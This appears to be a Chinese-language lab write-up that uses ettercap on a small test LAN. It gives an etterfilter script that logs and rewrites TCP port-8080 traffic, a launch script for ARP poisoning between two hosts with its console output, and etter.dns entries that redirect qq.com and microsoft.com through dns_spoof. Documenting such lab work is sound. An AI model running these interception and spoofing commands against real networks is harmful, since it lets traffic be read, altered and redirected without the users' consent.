文章目录
系统环境
NAME="Ubuntu"
VERSION="20.04.5 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.5 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal
install ettercap
sudo apt-get update
sudo apt-get -y install ettercap-common
实验环境
相同局域网内
服务器A:
-
# ip: 192.168.63.199 sudo nc -l 8080
服务器B
-
# ip: 192.168.63.147 sudo nc 192.168.63.199 8080
攻击机
-
# ip: 192.168.63.69
功能测试
TCP命令篡改
编写filter: test_dns.filter
if (ip.proto == TCP) {
msg("TCP DATA");
if (tcp.src == 8080 || tcp.dst == 8080) {
msg("TCP 8080");
log(DECODED.data, "./decrypted_log");
if (search(DECODED.data, "1")) {
DATA.data = "999";
}
}
}
编写启动脚本: e_tcp.sh
#!/bin/sh
echo "TCP劫持检测"
echo "重新编译过滤器"
sudo rm -rf dns.ef
sudo etterfilter test_dns.filter -o dns.ef
echo "启动arp欺骗"
ettercap -Tq -i wlp1s0 -M ARP:remote -F dns.ef -w tcp8080.pcap /192.168.63.199// /192.168.63.147//
启动程序
sudo ./e_tcp.sh
成功返回
启动arp欺骗
ettercap 0.8.3 copyright 2001-2019 Ettercap Development Team
Content filters loaded from dns.ef...
Listening on:
wlp1s0 -> 00:21:5D:2D:2D:55
192.168.63.232/255.255.255.0
fe80::8ca3:6ca9:3650:cb33/64
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Ettercap might not work correctly. /proc/sys/net/ipv6/conf/all/use_tempaddr is not set to 0.
Ettercap might not work correctly. /proc/sys/net/ipv6/conf/wlp1s0/use_tempaddr is not set to 0.
Privileges dropped to EUID 0 EGID 0...
34 plugins
42 protocol dissectors
57 ports monitored
24609 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services
Lua: no scripts were specified, not starting up!
Scanning for merged targets (2 hosts)...
* |==================================================>| 100.00 %
3 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 192.168.63.199 92:D5:E6:B6:A0:A2
GROUP 2 : 192.168.63.147 EA:56:E0:23:CE:CD
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
TCP DATA
TCP 8080
TCP DATA
TCP 8080
TCP DATA
TCP 8080
TCP DATA
TCP 8080
TCP DATA
TCP 8080
数据传输图
DNS命令篡改
修改配置文件
sudo vim /etc/ettercap/etter.conf 将uid和gid改成 0
# 内容如下
[privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
sudo vim /etc/ettercap/etter.dns 修改rederect (重定向网站(ip:180.101.50.242))
# redirect it to www.linux.org
#
qq.com A 180.101.50.242
microsoft.com A 107.170.40.56 1800
*.microsoft.com A 107.170.40.56 3600
www.microsoft.com PTR 107.170.40.56 # Wildcards in PTR are not allowed
#*.com A 180.101.50.242
启动攻击 : 不指定IP则是全局域网
sudo ettercap -i wlp1s0 -Tq -P dns_spoof -M arp:remote /192.168.63.199// /192.168.63.1//